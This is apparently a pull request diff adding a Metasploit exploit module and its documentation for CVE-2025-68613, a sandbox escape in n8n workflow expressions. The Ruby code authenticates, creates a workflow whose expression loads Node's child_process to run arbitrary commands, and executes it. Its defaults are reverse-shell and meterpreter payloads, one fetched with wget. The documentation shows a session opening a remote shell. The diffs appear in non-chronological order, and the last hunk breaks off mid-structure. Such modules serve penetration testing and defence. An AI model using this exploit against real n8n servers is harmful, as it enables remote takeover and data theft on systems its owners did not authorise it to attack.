### PR TITLE
Adds module for n8n workflow expression RCE (CVE-2025-68613)

### DIFF
--- a/documentation/modules/exploit/multi/http/n8n_workflow_expression_rce.md
+++ b/documentation/modules/exploit/multi/http/n8n_workflow_expression_rce.md
@@ -1,0 +1,81 @@
+## Vulnerable Application
+
+This module exploits CVE-2025-68613, a critical remote code execution vulnerability in n8n, an open-source workflow automation platform. The vulnerability exists in the workflow expression evaluation system where user-supplied expressions are evaluated in an execution context that is not sufficiently isolated from the underlying Node.js runtime.
+
+An authenticated attacker can create a workflow containing malicious expressions that escape the sandbox and execute arbitrary system commands.
+
+**Affected Versions:**
+- n8n >= 0.211.0 and < 1.120.4
+- n8n >= 1.121.0 and < 1.121.1
+- n8n >= 1.122.0 (unpatched pre-releases)
+
+**Fixed Versions:** 1.120.4, 1.121.1, 1.122.0
+
+### Installation
+
+1. Run a vulnerable n8n instance using Docker:
+```bash
+docker run -d --name n8n-vuln -p 5678:5678 \
+  -e N8N_BASIC_AUTH_ACTIVE=true \
+  -e N8N_BASIC_AUTH_USER=admin \
+  -e N8N_BASIC_AUTH_PASSWORD=password \
+  n8nio/n8n:1.120.0
+```
+
+2. Access n8n at `http://localhost:5678` and complete initial setup if required.
+
+## Verification Steps
+
+1. Install a vulnerable n8n instance
+2. Start msfconsole
+3. Do: `use exploit/multi/http/n8n_workflow_expression_rce`
+4. Do: `set RHOSTS <target>`
+5. Do: `set USERNAME <email>`
+6. Do: `set PASSWORD <password>`
+7. Do: `run`
+8. You should get a shell
+
+## Options
+
+### USERNAME
+The n8n username or email for authentication. Required.
+
+### PASSWORD
+The n8n password for authentication. Required.
+
+### TARGETURI
+Base path to n8n. Default is `/`.
+
+## Scenarios
+
+### n8n 1.120.0 on Docker (Linux)
+
+```
+msf6 > use exploit/multi/http/n8n_workflow_expression_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(multi/http/n8n_workflow_expression_rce) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf6 exploit(multi/http/n8n_workflow_expression_rce) > set USERNAME admin@example.com
+USERNAME => admin@example.com
+msf6 exploit(multi/http/n8n_workflow_expression_rce) > set PASSWORD password123
+PASSWORD => password123
+msf6 exploit(multi/http/n8n_workflow_expression_rce) > set LHOST 192.168.1.50
+LHOST => 192.168.1.50
+msf6 exploit(multi/http/n8n_workflow_expression_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.50:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.120.0 is vulnerable (< 1.120.4)
+[*] Attempting to authenticate...
+[+] Successfully authenticated
+[*] Creating malicious workflow...
+[+] Created workflow with ID: abc123
+[*] Executing workflow abc123...
+[*] Workflow execution response: 200
+[*] Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.100:45678)
+
+id
+uid=1000(node) gid=1000(node) groups=1000(node)
+whoami
+node
+```

--- a/documentation/modules/exploit/multi/http/n8n_workflow_expression_rce.md
+++ b/documentation/modules/exploit/multi/http/n8n_workflow_expression_rce.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-This module exploits CVE-2025-68613, a critical remote code execution vulnerability in n8n, an open-source workflow automation platform. The vulnerability exists in the workflow expression evaluation system where user-supplied expressions are evaluated in an execution context that is not sufficiently isolated from the underlying Node.js runtime.
+This module exploits CVE-2025-68613, a critical remote code execution vulnerability in n8n, an open-source workflow automation platform. The vulnerability exists in the workflow expression evaluation system, where user-supplied expressions are evaluated in an execution context that is not sufficiently isolated from the underlying Node.js runtime.
 
 An authenticated attacker can create a workflow containing malicious expressions that escape the sandbox and execute arbitrary system commands.
 

--- a/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
+++ b/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
@@ -52,7 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+                'FETCH_COMMAND' => 'wget'
               }
             }
           ],
@@ -68,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-        'Payload' => 
-        {
+        'Payload' => {
           'BadChars' => %(')
         },
         'Privileged' => false,
@@ -187,9 +187,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_malicious_workflow(cmd)
+    expression_payload = %<{{ (function(){ return this.process.mainModule.require('child_process').execSync('#{cmd}').toString() })() }}>
 
-    expression_payload = %<{{ (function(){ return this.process.mainModule.require('child_process').execSync('/bin/touch /tmp/test').toString() })() }}>
-    
     @workflow_name = "workflow_#{Rex::Text.rand_text_alphanumeric(8)}"
 
     workflow_data = {
@@ -203,37 +202,42 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'nodes' => [
         {
-          'parameters' => {
-            'rule' => {
-              'interval' => [{ 'field' => 'seconds', 'secondsInterval' => 3 }]
-            }
-          },
+          parameters: {},
+          type: 'n8n-nodes-base.manualTrigger',
+          typeVersion: 1,
+          position: [
+            0,
+            0
+          ],
           'id' => Rex::Text.rand_text_alphanumeric(36),
-          'name' => 'Schedule Trigger',
-          'type' => 'n8n-nodes-base.scheduleTrigger',
-          'typeVersion' => 1.1,
-          'position' => [250, 300]
+          name: "When clicking 'Execute workflow'"
         },
         {
-          'parameters' => {
-            'values' => {
-              'string' => [
+          parameters: {
+            assignments: {
+              assignments: [
                 {
-                  'name' => 'result',
-                  'value' => expression_payload
+                  'id' => Rex::Text.rand_text_alphanumeric(36),
+                  name: 'test',
+                  value: "=#{expression_payload}",
+                  type: 'string'
                 }
               ]
-            }
+            },
+            options: {}
           },
+          type: 'n8n-nodes-base.set',
+          typeVersion: 3.4,
+          position: [
+            208,
+            0
+          ],
           'id' => Rex::Text.rand_text_alphanumeric(36),
-          'name' => 'Edit Fields',
-          'type' => 'n8n-nodes-base.set',
-          'typeVersion' => 1,
-          'position' => [450, 300]
-        }
+          name: 'Edit Fields'
+        },
       ],
       'connections' => {
-        'Schedule Trigger' => {
+        "When clicking 'Execute workflow'" => {
           'main' => [
             [
               {
@@ -262,58 +266,53 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     json = res.get_json_document
-   
+
     workflow_id = json.dig('data', 'id') || json['id']
     nodes = json.dig('data', 'nodes')
     version_id = json.dig('data', 'versionId')
-    id = json.dig('data','id')
-    
-    puts workflow_id
-    puts nodes
-    puts version_id
-    puts id
+    id = json.dig('data', 'id')
 
     unless workflow_id
       fail_with(Failure::UnexpectedReply, 'Failed to get workflow ID from response')
     end
-      
+
     activation_data = {
-        'workflowData' => {
-          'name' => @workflow_name,
-          'nodes' => nodes,
-          'pinData' => {},
-              "connections"=> {
-      "Schedule Trigger"=> {
-        "main"=> [
-          [
-            {
-              "node"=> "Set",
-              "type"=> "main",
-              "index"=> 0
-            }
-          ]
-        ]
-      }
-    },
-        "active"=> false,
-    "settings"=> {
-      "saveDataErrorExecution"=> "all",
-      "saveDataSuccessExecution"=> "all",
-      "saveManualExecutions"=> true,
-      "executionOrder"=> "v1"
-    },
-    "tags"=> [],
-    "versionId" => version_id,
-    "meta" => "null",
-    "id" => id
+      'workflowData' => {
+        'name' => @workflow_name,
+        'nodes' => nodes,
+        'pinData' => {},
+        'connections' => {
+          "When clicking 'Execute workflow'" => {
+            'main' => [
+              [
+                {
+                  'node' => 'Edit Fields',
+                  'type' => 'main',
+                  'index' => 0
+                }
+              ]
+            ]
+          }
         },
-          "startNodes"=> [],
-  "destinationNode"=> "Set"
+        'active' => false,
+        'settings' => {
+          'saveDataErrorExecution' => 'all',
+          'saveDataSuccessExecution' => 'all',
+          'saveManualExecutions' => true,
+          'executionOrder' => 'v1'
+        },
+        'tags' => [],
+        'versionId' => version_id,
+        'meta' => 'null',
+        'id' => id
+      },
+      'startNodes' => [],
+      'destinationNode' => 'Edit Fields'
     }
 
-    res = send_request_cgi(
+    send_request_cgi(
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', workflow_id.to_s,'run'),
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', workflow_id.to_s, 'run'),
       'ctype' => 'application/json',
       'keep_cookies' => true,
       'data' => activation_data.to_json
@@ -326,7 +325,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_workflow(workflow_id)
     print_status("Activating workflow #{workflow_id} to trigger scheduled execution...")
-
 
     res = send_request_cgi(
       'method' => 'PATCH',
@@ -358,8 +356,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     authenticate
 
-    workflow_id = create_malicious_workflow(payload.encoded)
-    execute_workflow(workflow_id)
+    create_malicious_workflow(payload.encoded)
   end
 
   def cleanup

--- a/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
+++ b/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
@@ -103,41 +103,16 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     return CheckCode::Unknown('Could not connect to n8n') unless res
+    return CheckCode::Detected('Connected to n8n, received unexpected response') unless res.code == 200
 
-    version = nil
+    json = res.get_json_document
+    version = Rex::Version.new(json['versionCli'])
 
-    if res.code == 200
-      json = res.get_json_document
-      version = json['versionCli'] if json.is_a?(Hash)
-    end
-
-    if version.nil?
-      send_request_cgi(
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'healthz')
-      )
-    end
-
-    return CheckCode::Detected('n8n detected but could not determine version') if version.nil?
+    return CheckCode::Detected('n8n detected but could not determine version') unless version
 
     print_status("Detected n8n version: #{version}")
 
-    begin
-      ver = Rex::Version.new(version)
-    rescue ArgumentError
-      return CheckCode::Detected("n8n detected, version parsing failed: #{version}")
-    end
-
-    # Vulnerable versions: >= 0.211.0 and < 1.120.4 or < 1.121.1 or < 1.122.0
-    if ver >= Rex::Version.new('0.211.0')
-      if ver < Rex::Version.new('1.120.4')
-        return CheckCode::Appears("Version #{version} is vulnerable (< 1.120.4)")
-      elsif ver >= Rex::Version.new('1.121.0') && ver < Rex::Version.new('1.121.1')
-        return CheckCode::Appears("Version #{version} is vulnerable (1.121.0)")
-      elsif ver >= Rex::Version.new('1.122.0')
-        return CheckCode::Safe("Version #{version} is not vulnerable")
-      end
-    end
+    return CheckCode::Appears("Version #{version} is vulnerable") if version.between?(Rex::Version.new('0.211.0'), Rex::Version.new('1.120.4')) || version == Rex::Version.new('1.121.0')
 
     CheckCode::Safe("Version #{version} is not vulnerable")
   end
@@ -155,14 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'password' => datastore['PASSWORD']
       }.to_json
     )
-
-    if res&.code == 200
-      json = res.get_json_document
-      if json.is_a?(Hash) && json['data']
-        print_good('Successfully authenticated')
-        return true
-      end
-    end
+    return true if res&.code == 200
 
     res = send_request_cgi(
       'method' => 'POST',
@@ -175,15 +143,9 @@ class MetasploitModule < Msf::Exploit::Remote
       }.to_json
     )
 
-    if res&.code == 200
-      json = res.get_json_document
-      if json.is_a?(Hash) && (json['data'] || json['success'])
-        print_good('Successfully authenticated')
-        return true
-      end
-    end
+    return true if res&.code == 200
 
-    fail_with(Failure::NoAccess, 'Authentication failed')
+    false
   end
 
   def create_malicious_workflow(cmd)
@@ -267,12 +229,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     json = res.get_json_document
 
-    workflow_id = json.dig('data', 'id') || json['id']
+    @workflow_id = json.dig('data', 'id') || json['id']
     nodes = json.dig('data', 'nodes')
     version_id = json.dig('data', 'versionId')
     id = json.dig('data', 'id')
 
-    unless workflow_id
+    unless @workflow_id
       fail_with(Failure::UnexpectedReply, 'Failed to get workflow ID from response')
     end
 
@@ -312,43 +274,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', workflow_id.to_s, 'run'),
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'run'),
       'ctype' => 'application/json',
       'keep_cookies' => true,
       'data' => activation_data.to_json
     )
 
-    print_good("Created workflow with ID: #{workflow_id}")
-    @workflow_id = workflow_id
-    workflow_id
+    print_good("Created workflow with ID: #{@workflow_id}")
   end
 
-  def execute_workflow(workflow_id)
-    print_status("Activating workflow #{workflow_id} to trigger scheduled execution...")
-
-    res = send_request_cgi(
-      'method' => 'PATCH',
-      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', workflow_id.to_s),
-      'ctype' => 'application/json',
-      'keep_cookies' => true,
-      'data' => { 'active' => true }.to_json
-    )
-
-    if res&.code == 200
-      print_good('Workflow activated - payload will execute via Schedule Trigger')
-      print_status('Waiting for scheduled execution (3-5 seconds)...')
-      Rex.sleep(5)
-    else
-      print_error("Failed to activate workflow: #{res&.code}")
-    end
-  end
-
-  def delete_workflow(workflow_id)
-    print_status("Cleaning up workflow #{workflow_id}...")
+  def delete_workflow
+    print_status("Cleaning up workflow #{@workflow_id}...")
 
     send_request_cgi(
       'method' => 'DELETE',
-      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', workflow_id.to_s),
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s),
       'keep_cookies' => true
     )
   end
@@ -372,7 +312,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'data' => { 'active' => false }.to_json
       )
 
-      delete_workflow(@workflow_id)
+      delete_workflow
       print_good('Workflow cleaned up successfully')
     rescue StandardError => e
       print_warning("Failed to clean up workflow: #{e.message}")

--- a/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
+++ b/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
@@ -1,0 +1,336 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'n8n Workflow Expression Remote Code Execution',
+        'Description' => %q{
+          This module exploits a critical remote code execution vulnerability (CVE-2025-68613)
+          in n8n workflow automation platform. The vulnerability exists in the workflow
+          expression evaluation system where user-supplied expressions enclosed in {{ }}
+          are evaluated in an execution context that is not sufficiently isolated from the
+          underlying Node.js runtime.
+
+          An authenticated attacker can create a workflow containing malicious expressions
+          that access the Node.js process object via this.process.mainModule.require to load
+          child_process and execute arbitrary system commands. The exploit uses a Schedule
+          Trigger node that automatically fires and evaluates the malicious expression.
+
+          Successful exploitation may lead to full compromise of the n8n instance,
+          including unauthorized access to sensitive data, modification of workflows,
+          and execution of system-level operations.
+
+          Affected versions: >= 0.211.0 and < 1.120.4, < 1.121.1, < 1.122.0
+        },
+        'Author' => [
+          'Lukas Johannes Möller'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-68613'],
+          ['URL', 'https://github.com/n8n-io/n8n/security/advisories'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2025-68613']
+        ],
+        'Platform' => %w[unix linux win],
+        'Arch' => [ARCH_CMD],
+        'Payload' => {
+          'BadChars' => "\x00\x0a\x0d\x22\x27\x5c"
+        },
+        'Targets' => [
+          [
+            'Unix/Linux Command',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2025-06-10',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 5678,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path to n8n', '/']),
+        OptString.new('USERNAME', [true, 'n8n username or email for authentication']),
+        OptString.new('PASSWORD', [true, 'n8n password for authentication'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'settings')
+    )
+
+    return CheckCode::Unknown('Could not connect to n8n') unless res
+
+    # Try to get version from various endpoints
+    version = nil
+
+    if res.code == 200
+      json = res.get_json_document
+      version = json['versionCli'] if json.is_a?(Hash)
+    end
+
+    # Also check healthz endpoint which may reveal version
+    if version.nil?
+      send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'healthz')
+      )
+      # Some installations expose version in headers or body
+    end
+
+    return CheckCode::Detected('n8n detected but could not determine version') if version.nil?
+
+    print_status("Detected n8n version: #{version}")
+
+    begin
+      ver = Rex::Version.new(version)
+    rescue ArgumentError
+      return CheckCode::Detected("n8n detected, version parsing failed: #{version}")
+    end
+
+    # Vulnerable versions: >= 0.211.0 and < 1.120.4 or < 1.121.1 or < 1.122.0
+    if ver >= Rex::Version.new('0.211.0')
+      if ver < Rex::Version.new('1.120.4')
+        return CheckCode::Appears("Version #{version} is vulnerable (< 1.120.4)")
+      elsif ver >= Rex::Version.new('1.121.0') && ver < Rex::Version.new('1.121.1')
+        return CheckCode::Appears("Version #{version} is vulnerable (1.121.0)")
+      elsif ver >= Rex::Version.new('1.122.0') && ver < Rex::Version.new('1.122.0')
+        # This condition won't ever be true, 1.122.0 is patched
+        return CheckCode::Appears("Version #{version} is vulnerable")
+      end
+    end
+
+    CheckCode::Safe("Version #{version} is not vulnerable")
+  end
+
+  def authenticate
+    print_status('Attempting to authenticate...')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'login'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => {
+        'emailOrLdapLoginId' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }.to_json
+    )
+
+    if res&.code == 200
+      json = res.get_json_document
+      if json.is_a?(Hash) && json['data']
+        print_good('Successfully authenticated')
+        return true
+      end
+    end
+
+    # Try alternate login format
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'login'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => {
+        'email' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }.to_json
+    )
+
+    if res&.code == 200
+      json = res.get_json_document
+      if json.is_a?(Hash) && (json['data'] || json['success'])
+        print_good('Successfully authenticated')
+        return true
+      end
+    end
+
+    fail_with(Failure::NoAccess, 'Authentication failed')
+  end
+
+  def create_malicious_workflow(cmd)
+    # CVE-2025-68613 Expression Sandbox Escape Payload
+    # Uses this.process.mainModule.require to access child_process directly
+    # The expression {{ }} evaluates JavaScript in n8n's expression context
+    escaped_cmd = cmd.gsub("'", "\\\\'")
+
+    # Working payload: this.process.mainModule.require('child_process').execSync()
+    expression_payload = "={{ (function(){ return this.process.mainModule.require('child_process')" \
+                         ".execSync('#{escaped_cmd}').toString() })() }}"
+
+    workflow_name = "workflow_#{Rex::Text.rand_text_alphanumeric(8)}"
+
+    workflow_data = {
+      'name' => workflow_name,
+      'active' => false,
+      'settings' => {
+        'saveDataErrorExecution' => 'all',
+        'saveDataSuccessExecution' => 'all',
+        'saveManualExecutions' => true,
+        'executionOrder' => 'v1'
+      },
+      'nodes' => [
+        {
+          'parameters' => {
+            'rule' => {
+              'interval' => [{ 'field' => 'seconds', 'secondsInterval' => 3 }]
+            }
+          },
+          'id' => Rex::Text.rand_text_alphanumeric(36),
+          'name' => 'Schedule Trigger',
+          'type' => 'n8n-nodes-base.scheduleTrigger',
+          'typeVersion' => 1.1,
+          'position' => [250, 300]
+        },
+        {
+          'parameters' => {
+            'values' => {
+              'string' => [
+                {
+                  'name' => 'result',
+                  'value' => expression_payload
+                }
+              ]
+            }
+          },
+          'id' => Rex::Text.rand_text_alphanumeric(36),
+          'name' => 'Set',
+          'type' => 'n8n-nodes-base.set',
+          'typeVersion' => 1,
+          'position' => [450, 300]
+        }
+      ],
+      'connections' => {
+        'Schedule Trigger' => {
+          'main' => [
+            [
+              {
+                'node' => 'Set',
+                'type' => 'main',
+                'index' => 0
+              }
+            ]
+          ]
+        }
+      }
+    }
+
+    print_status('Creating malicious workflow...')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => workflow_data.to_json
+    )
+
+    unless res&.code == 200 || res&.code == 201
+      fail_with(Failure::UnexpectedReply, "Failed to create workflow: #{res&.code}")
+    end
+
+    json = res.get_json_document
+    workflow_id = json.dig('data', 'id') || json['id']
+
+    unless workflow_id
+      fail_with(Failure::UnexpectedReply, 'Failed to get workflow ID from response')
+    end
+
+    print_good("Created workflow with ID: #{workflow_id}")
+    @workflow_id = workflow_id
+    workflow_id
+  end
+
+  def execute_workflow(workflow_id)
+    print_status("Activating workflow #{workflow_id} to trigger scheduled execution...")
+
+    # Activate the workflow via PATCH - the Schedule Trigger will fire automatically
+    res = send_request_cgi(
+      'method' => 'PATCH',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', workflow_id.to_s),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => { 'active' => true }.to_json
+    )
+
+    if res&.code == 200
+      print_good('Workflow activated - payload will execute via Schedule Trigger')
+      print_status('Waiting for scheduled execution (3-5 seconds)...')
+      Rex.sleep(5)
+    else
+      print_error("Failed to activate workflow: #{res&.code}")
+    end
+  end
+
+  def delete_workflow(workflow_id)
+    print_status("Cleaning up workflow #{workflow_id}...")
+
+    send_request_cgi(
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', workflow_id.to_s),
+      'keep_cookies' => true
+    )
+  end
+
+  def exploit
+    authenticate
+
+    workflow_id = create_malicious_workflow(payload.encoded)
+    execute_workflow(workflow_id)
+  end
+
+  def cleanup
+    super
+    return unless @workflow_id
+
+    begin
+      delete_workflow(@workflow_id)
+      print_good('Workflow cleaned up successfully')
+    rescue StandardError => e
+      print_warning("Failed to clean up workflow: #{e.message}")
+    end
+
+    @workflow_id = nil
+  end
+end

--- a/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
+++ b/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
@@ -16,15 +16,16 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'n8n Workflow Expression Remote Code Execution',
         'Description' => %q{
           This module exploits a critical remote code execution vulnerability (CVE-2025-68613)
-          in n8n workflow automation platform. The vulnerability exists in the workflow
+          in the n8n workflow automation platform. The vulnerability exists in the workflow
           expression evaluation system where user-supplied expressions enclosed in {{ }}
           are evaluated in an execution context that is not sufficiently isolated from the
           underlying Node.js runtime.
 
           An authenticated attacker can create a workflow containing malicious expressions
-          that access the Node.js process object via this.process.mainModule.require to load
-          child_process and execute arbitrary system commands. The exploit uses a Schedule
-          Trigger node that automatically fires and evaluates the malicious expression.
+          that access the Node.js process object via this.process.mainModule.require (or via
+          the constructor) to load child_process and execute arbitrary system commands.
+          This module uses a Schedule Trigger node to automatically fire and evaluate the
+          malicious payload. This requires valid credentials to create workflows.
 
           Successful exploitation may lead to full compromise of the n8n instance,
           including unauthorized access to sensitive data, modification of workflows,
@@ -41,11 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/n8n-io/n8n/security/advisories'],
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2025-68613']
         ],
-        'Platform' => %w[unix linux win],
+        'Platform' => ['unix', 'linux', 'win'],
         'Arch' => [ARCH_CMD],
-        'Payload' => {
-          'BadChars' => "\x00\x0a\x0d\x22\x27\x5c"
-        },
         'Targets' => [
           [
             'Unix/Linux Command',
@@ -102,7 +100,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown('Could not connect to n8n') unless res
 
-    # Try to get version from various endpoints
     version = nil
 
     if res.code == 200
@@ -110,13 +107,11 @@ class MetasploitModule < Msf::Exploit::Remote
       version = json['versionCli'] if json.is_a?(Hash)
     end
 
-    # Also check healthz endpoint which may reveal version
     if version.nil?
       send_request_cgi(
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, 'healthz')
       )
-      # Some installations expose version in headers or body
     end
 
     return CheckCode::Detected('n8n detected but could not determine version') if version.nil?
@@ -135,9 +130,8 @@ class MetasploitModule < Msf::Exploit::Remote
         return CheckCode::Appears("Version #{version} is vulnerable (< 1.120.4)")
       elsif ver >= Rex::Version.new('1.121.0') && ver < Rex::Version.new('1.121.1')
         return CheckCode::Appears("Version #{version} is vulnerable (1.121.0)")
-      elsif ver >= Rex::Version.new('1.122.0') && ver < Rex::Version.new('1.122.0')
-        # This condition won't ever be true, 1.122.0 is patched
-        return CheckCode::Appears("Version #{version} is vulnerable")
+      elsif ver >= Rex::Version.new('1.122.0')
+        return CheckCode::Safe("Version #{version} is not vulnerable")
       end
     end
 
@@ -166,7 +160,6 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    # Try alternate login format
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'rest', 'login'),
@@ -190,14 +183,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_malicious_workflow(cmd)
-    # CVE-2025-68613 Expression Sandbox Escape Payload
-    # Uses this.process.mainModule.require to access child_process directly
-    # The expression {{ }} evaluates JavaScript in n8n's expression context
-    escaped_cmd = cmd.gsub("'", "\\\\'")
+    escaped_cmd = Rex::Text.escape_single_quotes(cmd)
 
-    # Working payload: this.process.mainModule.require('child_process').execSync()
-    expression_payload = "={{ (function(){ return this.process.mainModule.require('child_process')" \
-                         ".execSync('#{escaped_cmd}').toString() })() }}"
+    expression_payload = '={{ (function(){ ' \
+                         "const p = this.process || this.constructor.constructor('return process')(); " \
+                         'const r = p.mainModule ? p.mainModule.require : p.require; ' \
+                         "return r('child_process').execSync('#{escaped_cmd}').toString(); " \
+                         '})() }}'
 
     workflow_name = "workflow_#{Rex::Text.rand_text_alphanumeric(8)}"
 
@@ -285,7 +277,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_workflow(workflow_id)
     print_status("Activating workflow #{workflow_id} to trigger scheduled execution...")
 
-    # Activate the workflow via PATCH - the Schedule Trigger will fire automatically
     res = send_request_cgi(
       'method' => 'PATCH',
       'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', workflow_id.to_s),
@@ -325,6 +316,14 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless @workflow_id
 
     begin
+      send_request_cgi(
+        'method' => 'PATCH',
+        'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s),
+        'ctype' => 'application/json',
+        'keep_cookies' => true,
+        'data' => { 'active' => false }.to_json
+      )
+
       delete_workflow(@workflow_id)
       print_good('Workflow cleaned up successfully')
     rescue StandardError => e

--- a/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
+++ b/modules/exploits/multi/http/n8n_workflow_expression_rce.rb
@@ -68,6 +68,10 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
+        'Payload' => 
+        {
+          'BadChars' => %(')
+        },
         'Privileged' => false,
         'DisclosureDate' => '2025-06-10',
         'DefaultTarget' => 0,
@@ -183,18 +187,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_malicious_workflow(cmd)
-    escaped_cmd = Rex::Text.escape_single_quotes(cmd)
 
-    expression_payload = '={{ (function(){ ' \
-                         "const p = this.process || this.constructor.constructor('return process')(); " \
-                         'const r = p.mainModule ? p.mainModule.require : p.require; ' \
-                         "return r('child_process').execSync('#{escaped_cmd}').toString(); " \
-                         '})() }}'
-
-    workflow_name = "workflow_#{Rex::Text.rand_text_alphanumeric(8)}"
+    expression_payload = %<{{ (function(){ return this.process.mainModule.require('child_process').execSync('/bin/touch /tmp/test').toString() })() }}>
+    
+    @workflow_name = "workflow_#{Rex::Text.rand_text_alphanumeric(8)}"
 
     workflow_data = {
-      'name' => workflow_name,
+      'name' => @workflow_name,
       'active' => false,
       'settings' => {
         'saveDataErrorExecution' => 'all',
@@ -227,7 +226,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           },
           'id' => Rex::Text.rand_text_alphanumeric(36),
-          'name' => 'Set',
+          'name' => 'Edit Fields',
           'type' => 'n8n-nodes-base.set',
           'typeVersion' => 1,
           'position' => [450, 300]
@@ -238,7 +237,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'main' => [
             [
               {
-                'node' => 'Set',
+                'node' => 'Edit Fields',
                 'type' => 'main',
                 'index' => 0
               }
@@ -263,11 +262,62 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     json = res.get_json_document
+   
     workflow_id = json.dig('data', 'id') || json['id']
+    nodes = json.dig('data', 'nodes')
+    version_id = json.dig('data', 'versionId')
+    id = json.dig('data','id')
+    
+    puts workflow_id
+    puts nodes
+    puts version_id
+    puts id
 
     unless workflow_id
       fail_with(Failure::UnexpectedReply, 'Failed to get workflow ID from response')
     end
+      
+    activation_data = {
+        'workflowData' => {
+          'name' => @workflow_name,
+          'nodes' => nodes,
+          'pinData' => {},
+              "connections"=> {
